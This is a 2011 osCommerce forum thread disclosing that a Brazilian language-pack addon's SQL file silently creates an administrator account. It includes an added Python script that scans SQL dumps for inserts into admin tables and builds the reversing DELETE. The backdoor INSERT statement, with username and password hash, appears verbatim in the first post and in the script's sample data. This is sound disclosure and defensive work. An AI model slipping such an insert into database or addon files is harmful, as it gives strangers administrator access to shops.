VictorSalechov Posted November 12, 2011

Hi all, I registered just to let you know that the following addon, http://addons.oscommerce.com/info/5571 , which is a Brazilian language pack, creates an unauthorized administrator with the username Davi if the user imports its SQL file. Hence this code from SQL_POTUGUES.sql:

insert into `administrators`(`user_name`,`user_password`) values ('Davi','8a1d681975271cf1b51e950b32051276:92');

PS: oscommerce rockz :)

/* I would love * to change the world * but they won't give me the * source code */ outside url's not allowed in signatures
VictorSalechov (Author) Posted November 12, 2011

It still pisses me off. Someone has imported this SQL file into my database, and now I have to undo it.
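The two posts above describe the problem (an addon's SQL file silently inserting an `administrators` row) and the cleanup (finding and undoing that row). The script below is an added example written for this thread, not code from the addon or from osCommerce: it scans an SQL dump for INSERT statements into tables that a language pack should never touch and builds the DELETE that reverses each one. The table list assumes the osCommerce 2.x schema, and the sample SQL is constructed here, with the `administrators` line being the exact statement quoted in the first post.

```python
import re
from typing import Dict, List

# Constructed sample standing in for an addon's SQL file (e.g. SQL_POTUGUES.sql).
# The administrators INSERT is the statement quoted in the post above; the
# other two statements are plausible language-pack content added for contrast.
SAMPLE_SQL = """\
insert into `languages` (`languages_id`, `name`, `code`) values (4, 'Português', 'pt');
INSERT INTO `administrators`(`user_name`,`user_password`) VALUES ('Davi','8a1d681975271cf1b51e950b32051276:92');
update configuration set configuration_value = 'pt' where configuration_key = 'DEFAULT_LANGUAGE';
"""

# Tables a language pack has no business writing to (assumption: osCommerce 2.x
# names; extend the set for your own schema).
SENSITIVE_TABLES = {"administrators", "admin", "admin_files", "admin_groups"}

# Matches "INSERT [IGNORE] INTO table [(cols)] VALUES (...);" case-insensitively.
INSERT_RE = re.compile(
    r"insert\s+(?:ignore\s+)?into\s+`?(?P<table>\w+)`?\s*"
    r"(?:\((?P<cols>[^)]*)\))?\s*values\s*\((?P<vals>.*?)\)\s*;",
    re.IGNORECASE | re.DOTALL,
)


def _split_sql_list(text: str) -> List[str]:
    """Split a comma-separated SQL list, honouring quotes and backslash escapes."""
    items, cur, quote, i = [], [], None, 0
    while i < len(text):
        ch = text[i]
        if quote:
            cur.append(ch)
            if ch == "\\" and i + 1 < len(text):  # keep escaped char verbatim
                cur.append(text[i + 1])
                i += 2
                continue
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            cur.append(ch)
        elif ch == ",":
            items.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    if cur or items:
        items.append("".join(cur).strip())
    return [item for item in items if item]


def find_sensitive_inserts(sql: str) -> List[Dict]:
    """Return every INSERT into a sensitive table, with its column/value mapping."""
    findings = []
    for m in INSERT_RE.finditer(sql):
        table = m.group("table").lower()
        if table not in SENSITIVE_TABLES:
            continue
        cols = [c.strip().strip("`") for c in _split_sql_list(m.group("cols") or "")]
        vals = _split_sql_list(m.group("vals"))
        # Without an explicit column list we cannot name columns, so index them.
        row = dict(zip(cols, vals)) if cols else {f"col{i}": v for i, v in enumerate(vals)}
        findings.append({"table": table, "row": row, "statement": m.group(0).strip()})
    return findings


def undo_statement(finding: Dict) -> str:
    """Build a DELETE that removes exactly the row the flagged INSERT created.

    Values are re-used verbatim (quotes included), so the DELETE matches only a
    row identical to the one inserted rather than, say, every user named Davi.
    """
    conds = " AND ".join(f"`{c}` = {v}" for c, v in finding["row"].items())
    return f"DELETE FROM `{finding['table']}` WHERE {conds};"


def scan_file(path: str) -> List[Dict]:
    """Scan an SQL file on disk before importing it into the shop database."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_sensitive_inserts(fh.read())


if __name__ == "__main__":
    for f in find_sensitive_inserts(SAMPLE_SQL):
        print("FLAGGED:", f["statement"])
        print("UNDO:   ", undo_statement(f))
```

Run it against the addon's SQL file with `scan_file("SQL_POTUGUES.sql")` before importing, and after an import has already happened, run the generated DELETE against the shop database and then list the `administrators` table by hand to confirm only the accounts you created remain.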
♥kymation Posted November 12, 2011

Verified. The code only exists in the 25 Nov 2008 version; the previous release is OK. The next time you see something like this, use the Report button on the addon to report it to a moderator.

Speaking of moderators, better get rid of that link in your sig before a mod does it for you.

Regards
Jim

See my profile for a list of my addons and ways to get support.
VictorSalechov (Author) Posted November 12, 2011

Thanks for the info, Jim. I was looking for the Report button, but I still can't find one 0_o
♥kymation Posted November 12, 2011

You need to click the History tab on the addon page. The Report icon is the one to the right. You may need to be logged in; I'm not sure about that part.

What makes me mad is that this has been in the code for three years.

Regards
Jim
Taipo Posted November 12, 2011

I think it's open posting on that addon, so someone may be able to upload an amended addon, or at least a note to warn about the administrator insert code.

- Stop osCommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: new security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX